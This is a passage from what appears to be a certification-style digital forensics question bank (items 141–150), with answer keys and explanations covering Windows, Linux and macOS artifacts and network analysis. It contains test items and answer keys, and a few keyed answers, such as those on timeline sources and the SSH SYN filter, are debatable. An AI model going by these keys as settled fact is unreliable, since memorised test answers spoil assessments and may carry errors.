The USBSTOR registry key and setupapi.dev.log contain information about USB devices connected to the system, including device IDs and timestamps.

141
MCQ · hard

During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?

A.The server is running a scheduled backup to an external cloud service
B.The server is performing legitimate Windows Update checks
C.The server is infected with malware that is beaconing to a command-and-control server
D.The server is being used as a proxy for internal users
Answer: C

The non-standard path and regular outbound connections are classic indicators of C2 beaconing.

Why this answer

svchost.exe from C:\Windows\Temp indicates a masquerading technique where malware names itself after a legitimate Windows process but runs from an unauthorized location. The outbound connections on port 443 are likely command-and-control (C2) traffic.

142
MCQ · medium

A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?

A.They store the user's web browsing history
B.They list all network connections made by the system
C.They record the first and last execution times of applications
D.They contain the actual content of user documents
Answer: C

Prefetch files track execution times and frequency.

Why this answer

Prefetch files contain the first run time, last run time, and run count of applications, plus loaded DLLs, useful for timeline analysis.

143
Multi-Select · hard

A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)

Select 3 answers
A.~/.bash_history
B./var/log/syslog
C./etc/passwd
D./var/log/auth.log
E./etc/crontab
Answers: A, D, E

Correct: ~/.bash_history contains the commands typed by the user.

Why this answer

Bash history shows commands typed by the user. Auth.log may show reverse shell connections. Cron jobs are common persistence mechanisms.

Syslog is too broad, and /etc/passwd shows users but not execution.

144
Multi-Select · medium

Which TWO of the following artifacts are used for timeline analysis in digital forensics? (Select two.)

Select 2 answers
A.LNK files
B.HKLM\SYSTEM
C.Prefetch files
D.HKLM\SAM
E.Windows Event Logs
Answers: A, C

LNK files contain timestamps of file access, useful for timeline.

Why this answer

LNK files are correct because they record the last access timestamp of the file or application they point to, along with the volume serial number and path. This metadata allows a forensic examiner to reconstruct user activity and file access sequences during timeline analysis. Prefetch files are correct because they store the last run time, run count, and file paths of executed applications, enabling the creation of a chronological timeline of program execution on a Windows system.

Exam trap

EC-Council often tests the distinction between artifacts that provide direct timestamps for user activity (LNK, Prefetch) versus those that store static configuration or security data (HKLM\SYSTEM, HKLM\SAM), leading candidates to incorrectly select registry hives as timeline sources.

145
MCQ · easy

In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?

A.Jumplists
B.Prefetch files
C.LNK files
D.ShellBags
Answer: A

Jumplists track recent files and tasks per application.

Why this answer

Jumplists contain recently accessed files and application-specific destinations, used for Quick Access and Recent Items.

146
MCQ · medium

A forensic investigator is examining a Mac system and wants to review recently accessed files and applications. Which macOS artifact is MOST useful for this purpose?

A.bash_history
B..plist files in ~/Library/Preferences/
C.Unified Logging (log stream)
D.FSEvents (/.fseventsd)
Answer: D

FSEvents records file system changes and can be used to reconstruct user activity.

Why this answer

FSEvents records file system events such as file creation, modification, and deletion. It is a key artifact for timeline analysis on macOS.

147
MCQ · easy

In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?

A.HKLM\Security
B.HKLM\System
C.NTUSER.DAT
D.HKLM\Sam
Answer: D

Correct: HKLM\SAM contains the SAM database with local user account hashes.

Why this answer

The Security Account Manager (SAM) registry hive stores local user account information and password hashes, typically located at HKLM\SAM.

148
MCQ · medium

A network forensic analyst captures traffic that includes the following Wireshark filter: "tcp.port == 22 and tcp.flags.syn == 1 and tcp.flags.ack == 0". What type of traffic is this filter selecting?

A.SSH traffic with payload
B.Outgoing SSH connection attempts
C.SSH key exchange
D.SSH established sessions
Answer: B

SYN packets to port 22 are connection initiation attempts, typically outgoing from the client.

Why this answer

The filter matches TCP packets to port 22 (SSH) with only the SYN flag set (SYN=1, ACK=0). These are the first packets in a TCP handshake, representing connection attempts.

149
MCQ · easy

Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?

A.SiLK
B.tcpdump
C.Nmap
D.Wireshark
Answer: A

SiLK is a flow analysis toolkit used for NetFlow data.

Why this answer

SiLK (System for Internet-Level Knowledge) is a set of NetFlow analysis tools designed for large-scale flow data analysis, including identifying top talkers and anomaly detection.

150
Multi-Select · medium

A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)

Select 2 answers
A.Jump Lists
B.Event ID 4624 logs
C.Prefetch files
D.System Restore points
E.SAM registry hive
Answers: A, C

Jump Lists and Prefetch files track recently used documents and applications.

Why this answer

Prefetch files track application launches; Jump Lists track recently used files per application.
